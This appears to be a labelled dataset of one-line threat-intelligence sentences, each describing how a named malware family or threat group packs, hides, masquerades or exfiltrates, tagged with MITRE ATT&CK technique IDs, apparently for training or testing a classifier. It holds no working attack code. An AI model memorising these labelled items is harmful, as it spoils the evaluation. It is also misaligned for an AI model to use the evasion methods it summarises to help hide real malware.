{"text1":"Aoqin Dragon has used the Themida packer to obfuscate malicious payloads.","labels":"['T1027.002']"}
|
|
{"text1":"Astaroth uses a software packer called Pe123\\RPolyCryptor.","labels":"['T1027.002']"}
|
|
{"text1":"Bisonal has used the MPRESS packer and similar tools for obfuscation.","labels":"['T1027.002']"}
|
|
{"text1":"CSPY Downloader has been packed with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"China Chopper's client component is packed with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"Clop has been packed to help avoid detection.","labels":"['T1027.002']"}
|
|
{"text1":"CostaBricks can implement a custom-built virtual machine mechanism to obfuscate its code.","labels":"['T1027.002']"}
|
|
{"text1":"DRATzarus's dropper can be packed with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"DarkComet has the option to compress its payload using UPX or MPRESS.","labels":"['T1027.002']"}
|
|
{"text1":"Dok is packed with a UPX executable packer.","labels":"['T1027.002']"}
|
|
{"text1":"During Night Dragon, threat actors used software packing in its tools.","labels":"['T1027.002']"}
|
|
{"text1":"Dyre has been delivered with encrypted resources and must be unpacked for execution.","labels":"['T1027.002']"}
|
|
{"text1":"Egregor's payloads are custom-packed, archived and encrypted to prevent analysis.","labels":"['T1027.002']"}
|
|
{"text1":"Elderwood has packed malware payloads before delivery to victims.","labels":"['T1027.002']"}
|
|
{"text1":"FYAnti has used ConfuserEx to pack its .NET module.","labels":"['T1027.002']"}
|
|
{"text1":"FatDuke has been regularly repacked by its operators to create large binaries and evade detection.","labels":"['T1027.002']"}
|
|
{"text1":"For Operation Dust Storm, the threat actors used UPX to pack some payloads.","labels":"['T1027.002']"}
|
|
{"text1":"For Operation Spalax, the threat actors used a variety of packers, including CyaX, to obfuscate malicious executables.","labels":"['T1027.002']"}
|
|
{"text1":"GreyEnergy is packed for obfuscation.","labels":"['T1027.002']"}
|
|
{"text1":"H1N1 uses a custom packing algorithm.","labels":"['T1027.002']"}
|
|
{"text1":"Hildegard has packed ELF files into other binaries.","labels":"['T1027.002']"}
|
|
{"text1":"HotCroissant has used the open source UPX executable packer.","labels":"['T1027.002']"}
|
|
{"text1":"HyperBro has the ability to pack its payload.","labels":"['T1027.002']"}
|
|
{"text1":"Kimsuky has packed malware with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"Lazarus Group has used Themida to pack malicious DLLs and other files.","labels":"['T1027.002']"}
|
|
{"text1":"LiteDuke has been packed with multiple layers of encryption.","labels":"['T1027.002']"}
|
|
{"text1":"Lokibot has used several packing methods for obfuscation.","labels":"['T1027.002']"}
|
|
{"text1":"Machete has been packed with NSIS.","labels":"['T1027.002']"}
|
|
{"text1":"Melcoz has been packed with VMProtect and Themida.","labels":"['T1027.002']"}
|
|
{"text1":"Metamorfo has used VMProtect to pack and protect files.","labels":"['T1027.002']"}
|
|
{"text1":"NETWIRE has used .NET packer tools to evade detection.","labels":"['T1027.002']"}
|
|
{"text1":"Night Dragon is known to use software packing in its tools.","labels":"['T1027.002']"}
|
|
{"text1":"OSX_OCEANLOTUS.D has a variant that is packed with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"OopsIE uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.","labels":"['T1027.002']"}
|
|
{"text1":"QakBot can encrypt and pack malicious payloads.","labels":"['T1027.002']"}
|
|
{"text1":"Raindrop used a custom packer for its Cobalt Strike payload, which was compressed using the LZMA algorithm.","labels":"['T1027.002']"}
|
|
{"text1":"Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.","labels":"['T1027.002', 'T1547.001']"}
|
|
{"text1":"SDBbot has used a packed installer file.","labels":"['T1027.002']"}
|
|
{"text1":"Saint Bot has been packed using a dark market crypter.","labels":"['T1027.002']"}
|
|
{"text1":"Sandworm Team used UPX to pack a copy of Mimikatz.","labels":"['T1027.002']"}
|
|
{"text1":"SeaDuke has been packed with the UPX packer.","labels":"['T1027.002']"}
|
|
{"text1":"ShimRat's loader has been packed with the compressed ShimRat core DLL and the legitimate DLL for it to hijack.","labels":"['T1027.002']"}
|
|
{"text1":"Some S-Type samples have been packed with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"Some ZeroT DLL files have been packed with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"Spark has been packed with Enigma Protector to obfuscate its contents.","labels":"['T1027.002']"}
|
|
{"text1":"Squirrelwaffle has been packed with a custom packer to hide payloads.","labels":"['T1027.002']"}
|
|
{"text1":"TA505 has used UPX to obscure malicious code.","labels":"['T1027.002']"}
|
|
{"text1":"The White Company has obfuscated their payloads through packing.","labels":"['T1027.002']"}
|
|
{"text1":"Threat Group-3390 has packed malware and tools.","labels":"['T1027.002']"}
|
|
{"text1":"Tomiris has been packed with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"Trojan.Karagany samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.","labels":"['T1027.002']"}
|
|
{"text1":"Versions of Babuk have been packed.","labels":"['T1027.002']"}
|
|
{"text1":"Zebrocy's Delphi variant was packed with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"ABK can extract a malicious Portable Executable (PE) from a photo.","labels":"['T1027.003']"}
|
|
{"text1":"APT37 uses steganography to send images to users that are embedded with shellcode.","labels":"['T1027.003']"}
|
|
{"text1":"Andariel has hidden malicious executables within PNG files.","labels":"['T1027.003']"}
|
|
{"text1":"Avenger can extract backdoor malware from downloaded images.","labels":"['T1027.003']"}
|
|
{"text1":"BBK can extract a malicious Portable Executable (PE) from a photo.","labels":"['T1027.003']"}
|
|
{"text1":"BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.","labels":"['T1027.003']"}
|
|
{"text1":"Bandook has used .PNG images within a zip file to build the executable.","labels":"['T1027.003']"}
|
|
{"text1":"Diavol has obfuscated its main code routines within bitmap images as part of its anti-analysis techniques.","labels":"['T1027.003']"}
|
|
{"text1":"Earth Lusca has used steganography to hide shellcode in a BMP image file.","labels":"['T1027.003']"}
|
|
{"text1":"For Operation Spalax, the threat actors used packers that read pixel data from images contained in PE files' resource sections and build the next layer of execution from the data.","labels":"['T1027.003']"}
|
|
{"text1":"IcedID has embedded binaries within RC4 encrypted .png files.","labels":"['T1027.003']"}
|
|
{"text1":"Invoke-PSImage can be used to embed a PowerShell script within the pixels of a PNG file.","labels":"['T1027.003']"}
|
|
{"text1":"Leviathan has used steganography to hide stolen data inside other files stored on Github.","labels":"['T1027.003']"}
|
|
{"text1":"LiteDuke has used image files to hide its loader component.","labels":"['T1027.003']"}
|
|
{"text1":"MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.","labels":"['T1027.003']"}
|
|
{"text1":"ObliqueRAT can hide its payload in BMP images hosted on compromised websites.","labels":"['T1027.003']"}
|
|
{"text1":"ProLock can use .jpg and .bmp files to store its payload.","labels":"['T1027.003']"}
|
|
{"text1":"RDAT can also embed data within a BMP image prior to exfiltration.","labels":"['T1027.003']"}
|
|
{"text1":"Raindrop used steganography to locate the start of its encoded payload within legitimate 7-Zip code.","labels":"['T1027.003']"}
|
|
{"text1":"Ramsay has PE data embedded within JPEG files contained within Word documents.","labels":"['T1027.003']"}
|
|
{"text1":"RegDuke can hide data in images, including use of the Least Significant Bit (LSB).","labels":"['T1027.003']"}
|
|
{"text1":"build_downer can extract malware from a downloaded JPEG.","labels":"['T1027.003']"}
|
|
{"text1":"Cardinal RAT and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.","labels":"['T1027.004']"}
|
|
{"text1":"DarkWatchman has used the \"csc.exe\" tool to compile a C# executable.","labels":"['T1027.004']"}
|
|
{"text1":"Gamaredon Group has compiled the source code for a downloader directly on the infected system using the built-in \"Microsoft.CSharp.CSharpCodeProvider\" class.","labels":"['T1027.004']"}
|
|
{"text1":"Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).","labels":"['T1027.004']"}
|
|
{"text1":"njRAT has used AutoIt to compile the payload and main script into a single executable after delivery.","labels":"['T1027.004']"}
|
|
{"text1":"APT3 has been known to remove indicators of compromise from tools.","labels":"['T1027.005']"}
|
|
{"text1":"Analysis of Daserf has shown that it regularly undergoes technical improvements to evade anti-virus detection.","labels":"['T1027.005']"}
|
|
{"text1":"Cobalt Strike includes a capability to modify the \"beacon\" payload to eliminate known signatures or unpacking methods.","labels":"['T1027.005']"}
|
|
{"text1":"Deep Panda has updated and modified its malware, resulting in different hash values that evade detection.","labels":"['T1027.005']"}
|
|
{"text1":"During Operation Wocao, threat actors edited variable names within the Impacket suite to avoid automated detection.","labels":"['T1027.005']"}
|
|
{"text1":"GALLIUM ensured each payload had a unique hash, including by using different types of packers.","labels":"['T1027.005']"}
|
|
{"text1":"InvisiMole has undergone regular technical improvements in an attempt to evade detection.","labels":"['T1027.005']"}
|
|
{"text1":"OilRig has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.","labels":"['T1027.005']"}
|
|
{"text1":"Penquin can remove strings from binaries.","labels":"['T1027.005']"}
|
|
{"text1":"PowerSploit's \"Find-AVSignature\" AntivirusBypass module can be used to locate single byte anti-virus signatures.","labels":"['T1027.005']"}
|
|
{"text1":"QakBot can make small changes to itself in order to change its checksum and hash value.","labels":"['T1027.005']"}
|
|
{"text1":"SUNBURST source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to SUNSPOT.","labels":"['T1027.005']"}
|
|
{"text1":"TEMP.Veles has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates.","labels":"['T1027.005']"}
|
|
{"text1":"The author of GravityRAT submitted samples to VirusTotal for testing, showing that the author modified the code to try to hide the DDE object in a different part of the document.","labels":"['T1027.005']"}
|
|
{"text1":"Waterbear can scramble, with random values, functions that will not be executed again.","labels":"['T1027.005']"}
|
|
{"text1":"APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.","labels":"['T1027.006']"}
|
|
{"text1":"EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.","labels":"['T1027.006']"}
|
|
{"text1":"Bazar can hash then resolve API calls at runtime.","labels":"['T1027.007']"}
|
|
{"text1":"Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.","labels":"['T1027.007']"}
|
|
{"text1":"Pteranodon can use a dynamic Windows hashing algorithm to map API components.","labels":"['T1027.007']"}
|
|
{"text1":"macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection.","labels":"['T1027.008']"}
|
|
{"text1":"Invoke-PSImage can be used to embed payload data within a new image file.","labels":"['T1027.009']"}
|
|
{"text1":"macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payload.","labels":"['T1027.009']"}
|
|
{"text1":"ADVSTORESHELL collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.","labels":"['T1029']"}
|
|
{"text1":"Chrommme can set itself to sleep before requesting a new command from C2.","labels":"['T1029']"}
|
|
{"text1":"Cobalt Strike can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval.","labels":"['T1029']"}
|
|
{"text1":"Flagpro has the ability to wait for a specified time interval between communicating with and executing commands from C2.","labels":"['T1029']"}
|
|
{"text1":"Higaisa sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes.","labels":"['T1029']"}
|
|
{"text1":"LightNeuron can be configured to exfiltrate data during nighttime or working hours.","labels":"['T1029']"}
|
|
{"text1":"Machete sends stolen data to the C2 server every 10 minutes.","labels":"['T1029']"}
|
|
{"text1":"POWERSTATS can sleep for a given number of seconds.","labels":"['T1029']"}
|
|
{"text1":"ShadowPad has sent data back to C2 every 8 hours.","labels":"['T1029']"}
|
|
{"text1":"jRAT can be configured to reconnect at certain intervals.","labels":"['T1029']"}
|
|
{"text1":"APT28 has split archived exfiltration files into chunks smaller than 1MB.","labels":"['T1030']"}
|
|
{"text1":"AppleSeed has divided files if the size is 0x1000000 bytes or more.","labels":"['T1030']"}
|
|
{"text1":"Cobalt Strike will break large data sets into smaller chunks for exfiltration.","labels":"['T1030']"}
|
|
{"text1":"During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.","labels":"['T1030']"}
|
|
{"text1":"Helminth splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.","labels":"['T1030']"}
|
|
{"text1":"Kessel can split the data to be exfiltrated into chunks that will fit in subdomains of DNS queries.","labels":"['T1030']"}
|
|
{"text1":"Kevin can exfiltrate data to the C2 server in 27-character chunks.","labels":"['T1030']"}
|
|
{"text1":"Mythic supports custom chunk sizes used to upload\/download files.","labels":"['T1030']"}
|
|
{"text1":"OopsIE exfiltrates command output and collected files to its C2 server in 1500-byte blocks.","labels":"['T1030']"}
|
|
{"text1":"POSHSPY uploads data in 2048-byte chunks.","labels":"['T1030']"}
|
|
{"text1":"The Rclone \"chunker\" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.","labels":"['T1030']"}
|
|
{"text1":"A Gamaredon Group file stealer can gather the victim's username to send to a C2 server.","labels":"['T1033']"}
|
|
{"text1":"A Linux version of Derusbi checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. Derusbi also gathers the username of the victim.","labels":"['T1033']"}
|
|
{"text1":"A module in Prikormka collects information from the victim about the current user name.","labels":"['T1033']"}
|
|
{"text1":"APT32 collected the victim's username and executed the \"whoami\" command on the victim's machine. APT32 executed shellcode to collect the username on the victim's machine.","labels":"['T1033']"}
|
|
{"text1":"APT39 used Remexi to collect usernames from the system.","labels":"['T1033']"}
|
|
{"text1":"APT41 used the WMIEXEC utility to execute \"whoami\" commands on remote machines.","labels":"['T1033']"}
|
|
{"text1":"Action RAT has the ability to collect the username from an infected host.","labels":"['T1033']"}
|
|
{"text1":"Agent.btz obtains the victim username and saves it to a file.","labels":"['T1033']"}
|
|
{"text1":"Amadey has collected the user name from a compromised host using `GetUserNameA`.","labels":"['T1033']"}
|
|
{"text1":"An APT3 downloader uses the Windows command \"\"cmd.exe\" \/C whoami\" to verify that it is running with the elevated privileges of \u201cSystem.\u201d","labels":"['T1033']"}
|
|
{"text1":"Aria-body has the ability to identify the username on a compromised host.","labels":"['T1033']"}
|
|
{"text1":"AuTo Stealer has the ability to collect the username from an infected host.","labels":"['T1033']"}
|
|
{"text1":"Azorult can collect the username from the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"BabyShark has executed the \"whoami\" command.","labels":"['T1033']"}
|
|
{"text1":"Backdoor.Oldrea collects the current username from the victim.","labels":"['T1033']"}
|
|
{"text1":"Bazar can identify the username of the infected user.","labels":"['T1033']"}
|
|
{"text1":"BloodHound can collect information on user sessions.","labels":"['T1033']"}
|
|
{"text1":"Bonadan has discovered the username of the user running the backdoor.","labels":"['T1033']"}
|
|
{"text1":"BoomBox can enumerate the username on a compromised host.","labels":"['T1033']"}
|
|
{"text1":"Cardinal RAT can collect the username from a victim machine.","labels":"['T1033']"}
|
|
{"text1":"Caterpillar WebShell can obtain a list of user accounts from a victim's machine.","labels":"['T1033']"}
|
|
{"text1":"Chaes has collected the username and UID from the infected machine.","labels":"['T1033']"}
|
|
{"text1":"Chimera has used the \"quser\" command to show currently logged on users.","labels":"['T1033']"}
|
|
{"text1":"Chrommme can retrieve the username from a targeted system.","labels":"['T1033']"}
|
|
{"text1":"Clambling can identify the username on a compromised host.","labels":"['T1033']"}
|
|
{"text1":"Crimson can identify the user on a targeted system.","labels":"['T1033']"}
|
|
{"text1":"DRATzarus can obtain a list of users from an infected machine.","labels":"['T1033']"}
|
|
{"text1":"DarkComet gathers the username from the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"Diavol can collect the username from a compromised host.","labels":"['T1033']"}
|
|
{"text1":"DnsSystem can use the Windows user name to create a unique identification for infected users and systems.","labels":"['T1033']"}
|
|
{"text1":"DownPaper collects the victim username and sends it to the C2 server.","labels":"['T1033']"}
|
|
{"text1":"Dragonfly 2.0 used the command \"query user\" on victim hosts.","labels":"['T1033']"}
|
|
{"text1":"Dragonfly used the command \"query user\" on victim hosts.","labels":"['T1033']"}
|
|
{"text1":"During Frankenstein, the threat actors used Empire to enumerate hosts and gather username, machine name, and administrative permissions information.","labels":"['T1033']"}
|
|
{"text1":"During Night Dragon, threat actors used password cracking and pass-the-hash tools to discover usernames and passwords.","labels":"['T1033']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance.","labels":"['T1033']"}
|
|
{"text1":"During Operation Wocao, threat actors enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system.","labels":"['T1033']"}
|
|
{"text1":"Dyre has the ability to identify the users on a compromised host.","labels":"['T1033']"}
|
|
{"text1":"EVILNUM can obtain the username from the victim's machine.","labels":"['T1033']"}
|
|
{"text1":"Earth Lusca collected information on user accounts via the \"whoami\" command.","labels":"['T1033']"}
|
|
{"text1":"Egregor has used tools to gather information about users.","labels":"['T1033']"}
|
|
{"text1":"Empire can enumerate the username on targeted hosts.","labels":"['T1033']"}
|
|
{"text1":"Epic collects the user name from the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"FELIXROOT collects the username from the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"FIN10 has used Meterpreter to enumerate users on remote systems.","labels":"['T1033']"}
|
|
{"text1":"Felismus collects the current username and sends it to the C2 server.","labels":"['T1033']"}
|
|
{"text1":"Flagpro has been used to run the \"whoami\" command on the system.","labels":"['T1033']"}
|
|
{"text1":"FlawedAmmyy enumerates the current user during the initial infection.","labels":"['T1033']"}
|
|
{"text1":"FunnyDream has the ability to gather user information from the targeted system using `whoami\/upn&whoami\/fqdn&whoami\/logonid&whoami\/all`.","labels":"['T1033']"}
|
|
{"text1":"GALLIUM used \"whoami\" and \"query user\" to obtain information about the victim user.","labels":"['T1033']"}
|
|
{"text1":"Gelsemium has the ability to distinguish between a standard user and an administrator on a compromised host.","labels":"['T1033']"}
|
|
{"text1":"Get2 has the ability to identify the current username of an infected host.","labels":"['T1033']"}
|
|
{"text1":"Gold Dragon collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.","labels":"['T1033']"}
|
|
{"text1":"GravityRAT collects the victim username along with other account information (account type, description, full name, SID and status).","labels":"['T1033']"}
|
|
{"text1":"HAWKBALL can collect the user name of the system.","labels":"['T1033']"}
|
|
{"text1":"HotCroissant has the ability to collect the username on the infected host.","labels":"['T1033']"}
|
|
{"text1":"KONNI can collect the username from the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"Ke3chang has used implants capable of collecting the signed-in username.","labels":"['T1033']"}
|
|
{"text1":"Koadic can identify logged in users across the domain and view user sessions.","labels":"['T1033']"}
|
|
{"text1":"Kwampirs collects registered owner details by using the commands \"systeminfo\" and \"net config workstation\".","labels":"['T1033']"}
|
|
{"text1":"Linux Rabbit opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain.","labels":"['T1033']"}
|
|
{"text1":"LiteDuke can enumerate the account name on a targeted system.","labels":"['T1033']"}
|
|
{"text1":"Lizar can collect the username from the system.","labels":"['T1033']"}
|
|
{"text1":"MacMa can collect the username from the compromised machine.","labels":"['T1033']"}
|
|
{"text1":"MarkiRAT can retrieve the victim\u2019s username.","labels":"['T1033']"}
|
|
{"text1":"Micropsia collects the username from the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"Milan can identify users registered to a targeted machine.","labels":"['T1033']"}
|
|
{"text1":"MirageFox can gather the username from the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"Mis-Type runs tests to determine the privilege level of the compromised user.","labels":"['T1033']"}
|
|
{"text1":"More_eggs has the capability to gather the username from the victim's machine.","labels":"['T1033']"}
|
|
{"text1":"Mosquito runs \"whoami\" on the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"NBTscan can list active users on the system.","labels":"['T1033']"}
|
|
{"text1":"NDiskMonitor obtains the victim username and encrypts the information to send over its C2 channel.","labels":"['T1033']"}
|
|
{"text1":"NOKKI can collect the username from the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"NanHaiShu collects the username from the victim.","labels":"['T1033']"}
|
|
{"text1":"Neoichor can collect the user name from a victim's machine.","labels":"['T1033']"}
|
|
{"text1":"ObliqueRAT can check for blocklisted usernames on infected endpoints.","labels":"['T1033']"}
|
|
{"text1":"Octopus can collect the username from the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"OilRig has run \"whoami\" on a victim.","labels":"['T1033']"}
|
|
{"text1":"Okrum can collect the victim username.","labels":"['T1033']"}
|
|
{"text1":"Operation Wocao has enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system.","labels":"['T1033']"}
|
|
{"text1":"POWERSTATS has the ability to identify the username on the compromised host.","labels":"['T1033']"}
|
|
{"text1":"POWRUNER may collect information about the currently logged in user by running \"whoami\" on a victim.","labels":"['T1033']"}
|
|
{"text1":"Patchwork collected the victim username and whether it was running as admin, then sent the information to its C2 server.","labels":"['T1033']"}
|
|
{"text1":"PoetRAT sent username, computer name, and the previously generated UUID in reply to a \"who\" command from C2.","labels":"['T1033']"}
|
|
{"text1":"PowerShower has the ability to identify the current user on the infected host.","labels":"['T1033']"}
|
|
{"text1":"PyDCrypt has probed victim machines with \"whoami\" and has collected the username from the machine.","labels":"['T1033']"}
|
|
{"text1":"QUADAGENT gathers the victim username.","labels":"['T1033']"}
|
|
{"text1":"QakBot can identify the user name on a compromised system.","labels":"['T1033']"}
|
|
{"text1":"QuasarRAT can enumerate the username and account type.","labels":"['T1033']"}
|
|
{"text1":"RATANKBA runs the \"whoami\" and \"query user\" commands.","labels":"['T1033']"}
|
|
{"text1":"RCSession can gather system owner information, including user and administrator privileges.","labels":"['T1033']"}
|
|
{"text1":"RGDoor executes the \"whoami\" on the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"ROKRAT can collect the username from a compromised host.","labels":"['T1033']"}
|
|
{"text1":"RTM can obtain the victim username and permissions.","labels":"['T1033']"}
|
|
{"text1":"RedLeaves can obtain information about the logged on user both locally and for Remote Desktop sessions.","labels":"['T1033']"}
|
|
{"text1":"Remsec can obtain information about the current user.","labels":"['T1033']"}
|
|
{"text1":"Revenge RAT gathers the username from the system.","labels":"['T1033']"}
|
|
{"text1":"Rifdoor has the ability to identify the username on the compromised host.","labels":"['T1033']"}
|
|
{"text1":"Rising Sun can detect the username of the infected host.","labels":"['T1033']"}
|
|
{"text1":"SDBbot has the ability to identify the user on a compromised host.","labels":"['T1033']"}
|
|
{"text1":"SLOTHFULMEDIA has collected the username from a victim machine.","labels":"['T1033']"}
|
|
{"text1":"SMOKEDHAM has used \"whoami\" commands to identify system owners.","labels":"['T1033']"}
|
|
{"text1":"STARWHALE can gather the username from an infected host.","labels":"['T1033']"}
|
|
{"text1":"SUNBURST collected the username from a compromised host.","labels":"['T1033']"}
|
|
{"text1":"ServHelper will attempt to enumerate the username of the victim.","labels":"['T1033']"}
|
|
{"text1":"SideTwist can collect the username on a targeted system.","labels":"['T1033']"}
|
|
{"text1":"Small Sieve can obtain the id of a logged in user.","labels":"['T1033']"}
|
|
{"text1":"SodaMaster can identify the username on a compromised host.","labels":"['T1033']"}
|
|
{"text1":"SombRAT can execute \"getinfo\" to identify the username on a compromised host.","labels":"['T1033']"}
|
|
{"text1":"Squirrelwaffle can collect the user name from a compromised host.","labels":"['T1033']"}
|
|
{"text1":"SslMM sends the logged-on username to its hard-coded C2.","labels":"['T1033']"}
|
|
{"text1":"Stealth Falcon malware gathers the registered user and primary owner name via WMI.","labels":"['T1033']"}
|
|
{"text1":"StrifeWater can collect the user name from the victim's machine.","labels":"['T1033']"}
|
|
{"text1":"SynAck gathers user names from infected hosts.","labels":"['T1033']"}
|
|
{"text1":"T9000 gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.","labels":"['T1033']"}
|
|
{"text1":"The OsInfo function in Komplex collects the current running username.","labels":"['T1033']"}
|
|
{"text1":"TrickBot can identify the user and groups the user belongs to on a compromised host.","labels":"['T1033']"}
|
|
{"text1":"Trojan.Karagany can gather information about the user on a compromised host.","labels":"['T1033']"}
|
|
{"text1":"UPPERCUT has the capability to collect the current logged on user\u2019s username from a machine.","labels":"['T1033']"}
|
|
{"text1":"Valak can gather information regarding the user.","labels":"['T1033']"}
|
|
{"text1":"WINDSHIELD can gather the victim user name.","labels":"['T1033']"}
|
|
{"text1":"WINERACK can gather information on the victim username.","labels":"['T1033']"}
|
|
{"text1":"WellMail can identify the current username on the victim system.","labels":"['T1033']"}
|
|
{"text1":"WinMM uses NetUser-GetInfo to identify that it is running under an \u201cAdmin\u201d account on the local system.","labels":"['T1033']"}
|
|
{"text1":"Wizard Spider has used \"whoami\" to identify the local user and their privileges.","labels":"['T1033']"}
|
|
{"text1":"XAgentOSX contains the getInfoOSX function to return the OS X version as well as the current user.","labels":"['T1033']"}
|
|
{"text1":"ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2.","labels":"['T1033']"}
|
|
{"text1":"Zebrocy gets the username from the system.","labels":"['T1033']"}
|
|
{"text1":"ZxxZ can collect the username from a compromised host.","labels":"['T1033']"}
|
|
{"text1":"njRAT enumerates the current user during the initial infection.","labels":"['T1033']"}
|
|
{"text1":"zwShell can obtain the name of the logged-in user on the victim.","labels":"['T1033']"}
|
|
{"text1":"APT28 has renamed the WinRAR utility to avoid detection.","labels":"['T1036']"}
|
|
{"text1":"AppleSeed can disguise JavaScript files as PDFs.","labels":"['T1036']"}
|
|
{"text1":"Bisonal dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script.","labels":"['T1036']"}
|
|
{"text1":"BoomBox has the ability to mask malicious data strings as PDF files.","labels":"['T1036']"}
|
|
{"text1":"Dragonfly 2.0 created accounts disguised as legitimate backup and service accounts as well as an email administration account.","labels":"['T1036']"}
|
|
{"text1":"Dragonfly has created accounts disguised as legitimate backup and service accounts as well as an email administration account.","labels":"['T1036']"}
|
|
{"text1":"EnvyScout has used folder icons for malicious files to lure victims into opening them.","labels":"['T1036']"}
|
|
{"text1":"Flagpro can download malicious files with a .tmp extension and append them with .exe prior to execution.","labels":"['T1036']"}
|
|
{"text1":"For Operation Dust Storm, the threat actors disguised some executables as JPG files.","labels":"['T1036']"}
|
|
{"text1":"Kimsuky has disguised its C2 addresses as the websites of shopping malls, governments, universities, and others.","labels":"['T1036']"}
|
|
{"text1":"Lazarus Group has disguised malicious template files as JPEG files to avoid detection.","labels":"['T1036']"}
|
|
{"text1":"LazyScripter has used several different security software icons to disguise executables.","labels":"['T1036']"}
|
|
{"text1":"Milan has used an executable named `companycatalogue` to appear benign.","labels":"['T1036']"}
|
|
{"text1":"Mustang Panda has used an additional filename extension to hide the true file type.","labels":"['T1036', 'T1036.007']"}
|
|
{"text1":"NativeZone has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system.","labels":"['T1036']"}
|
|
{"text1":"Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface.","labels":"['T1036']"}
|
|
{"text1":"NotPetya drops PsExec with the filename dllhost.dat.","labels":"['T1036']"}
|
|
{"text1":"PLATINUM has renamed rar.exe to avoid detection.","labels":"['T1036']"}
|
|
{"text1":"PowGoop has disguised a PowerShell script as a .dat file (goopdate.dat).","labels":"['T1036']"}
|
|
{"text1":"QuasarRAT has dropped binaries as files named microsoft_network.exe and crome.exe.","labels":"['T1036']"}
|
|
{"text1":"RCSession has used a file named English.rtf to appear benign on victim hosts.","labels":"['T1036']"}
|
|
{"text1":"Raindrop was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code.","labels":"['T1036']"}
|
|
{"text1":"Ryuk can create .dll files that actually contain a Rich Text File format document.","labels":"['T1036']"}
|
|
{"text1":"Saint Bot has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection.","labels":"['T1036']"}
|
|
{"text1":"SombRAT can use a legitimate process name to hide itself.","labels":"['T1036']"}
|
|
{"text1":"The QakBot payload has been disguised as a PNG file.","labels":"['T1036']"}
|
|
{"text1":"TrailBlazer has used filenames that match the name of the compromised system in attempt to avoid detection.","labels":"['T1036']"}
|
|
{"text1":"UNC2452 set the hostnames of its C2 infrastructure to match legitimate hostnames in the victim environment. They also primarily used IP addresses originating from the same country as the victim for their VPN infrastructure.","labels":"['T1036']"}
|
|
{"text1":"WhisperGate has been disguised as a JPG extension to avoid detection as a malicious PE file.","labels":"['T1036']"}
|
|
{"text1":"XCSSET builds a malicious application bundle to resemble Safari through using the Safari icon and \"Info.plist\".","labels":"['T1036']"}
|
|
{"text1":"menuPass has used esentutl to change file extensions to their true type that were masquerading as .txt files.","labels":"['T1036']"}
|
|
{"text1":"APT37 has signed its malware with an invalid digital certificates listed as \u201cTencent Technology (Shenzhen) Company Limited.\u201d","labels":"['T1036.001']"}
|
|
{"text1":"BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.","labels":"['T1036.001']"}
|
|
{"text1":"Gelsemium has used unverified signatures on malicious DLLs.","labels":"['T1036.001']"}
|
|
{"text1":"PcShare has used an invalid certificate in attempt to appear legitimate.","labels":"['T1036.001']"}
|
|
{"text1":"WindTail has been incompletely signed with revoked certificates.","labels":"['T1036.001']"}
|
|
{"text1":"Windshift has used revoked certificates to sign malware.","labels":"['T1036.001']"}
|
|
{"text1":"BlackTech has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.","labels":"['T1036.002']"}
|
|
{"text1":"Ferocious Kitten has used right-to-left override to reverse executables\u2019 names to make them appear to have different file extensions, rather than their real ones.","labels":"['T1036.002']"}
|
|
{"text1":"Ke3chang has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files.","labels":"['T1036.002']"}
|
|
